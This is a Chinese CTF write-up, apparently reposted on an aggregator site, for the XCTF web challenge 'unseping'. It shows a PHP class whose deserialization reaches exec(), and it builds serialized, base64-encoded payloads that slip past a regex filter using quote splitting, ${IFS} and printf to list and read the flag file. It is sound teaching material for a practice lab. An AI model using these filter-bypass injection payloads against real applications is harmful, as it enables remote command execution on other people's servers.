您的位置:首页 > 教育 > 培训 > 免费空间背景_建设工程合同是什么_域名查询平台_制作网页的流程步骤

免费空间背景_建设工程合同是什么_域名查询平台_制作网页的流程步骤

2025/5/17 12:06:31 来源:https://blog.csdn.net/2302_80280669/article/details/142982664  浏览:    关键词:免费空间背景_建设工程合同是什么_域名查询平台_制作网页的流程步骤
免费空间背景_建设工程合同是什么_域名查询平台_制作网页的流程步骤

导言:

本文主要讲述在CTF竞赛中,web类反序列化题目unseping。。

靶场链接:攻防世界 (xctf.org.cn)

反序列化漏洞:反序列化漏洞(二)_fst反序列化 rocksdb 字段值错误-CSDN博客

打开后可以看到:

可以看到是一段php代码,根据这段代码可以看到这是一段反序列化题目。

并且在名为waf的函数中,过滤了大部分的特殊字符。

并且,是使用传参名为ctf的post类型传参。

<?php
highlight_file(__FILE__);class ease{// 定义私有变量private $method;private $args;// 构造函数,接收两个参数function __construct($method, $args) {$this->method = $method;$this->args = $args;}// 析构函数,当对象被销毁时调用function __destruct(){// 如果方法在数组中,则调用该方法if (in_array($this->method, array("ping"))) {call_user_func_array(array($this, $this->method), $this->args);}} // ping方法,接收一个参数,执行exec函数function ping($ip){exec($ip, $result);var_dump($result);}// waf方法,接收一个参数,使用正则表达式进行过滤function waf($str){if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {return $str;} else {echo "don't hack";}}// __wakeup方法,当对象被反序列化时调用function __wakeup(){// 遍历args数组,对每个元素进行waf过滤foreach($this->args as $k => $v) {$this->args[$k] = $this->waf($v);}}   
}// 接收POST参数ctf
$ctf=@$_POST['ctf'];
// 对ctf进行base64解码,并反序列化
@unserialize(base64_decode($ctf));
?>

此时,就知道:我们应该通过命令执行获取flag且绕过waf函数的过滤,最后将序列化的payload并进行base64编码,最后利用post请求进行发送即可

所以,使用hackbar打开,并选择post型传参。

构造payload:

<?php// 定义一个类ease
class ease{// 定义私有变量method和argsprivate $method;private $args;// 构造函数,接收两个参数method和argsfunction __construct($method, $args) {$this->method = $method;$this->args = $args;}}
// 创建一个ease对象,参数为"ping"和array('l""s')
$a = new ease("ping",array('l""s'));
// 将对象序列化
$b = serialize($a);
// 输出序列化后的对象
echo $b;
echo'</br>';
// 将序列化后的对象进行base64编码
echo base64_encode($b);
?>

将其运行后,可以得到payload:

使用hackbar发送后,可以看到:

flag在flag_1s_here文件夹内,查看此文件夹的payload为:

<?php
class ease{// 定义私有变量method和argsprivate $method;private $args;// 构造函数,接收两个参数method和argsfunction __construct($method, $args) {$this->method = $method;$this->args = $args;}}// 创建ease对象,参数为"ping"和array('l""s${IFS}f""lag_1s_here')
$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
// 将对象序列化
$s = serialize($o);
// 将序列化后的对象进行base64编码
echo base64_encode($s);
?>

flag在flag_831b69012c67b35f.php文件夹内。

此时,payload为:

<?php// 定义一个名为ease的类
class ease{
// 定义两个私有属性
private $method;
private $args;
// 构造函数,接受两个参数
function __construct($method, $args) {$this->method = $method;$this->args = $args;
}}
// 创建一个ease对象,参数为"ping"和数组
$a = new ease("ping",array('c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
// 将对象序列化
$b = serialize($a);
// 输出序列化后的对象
echo $b;
echo'</br>';
// 将序列化后的对象进行base64编码
echo base64_encode($b);
?>

得到flag。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

推荐新闻

热搜词

计算机软件侵权责任,计算机软件侵权的法律责任 如何创建Linux交换文件?Linux交换文件最新创建方法 珠海盈致MES系统何以成为制造业数字化转型的智能引擎? 4月做题记录 Day0032 生病d5 CAN总线通信二

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989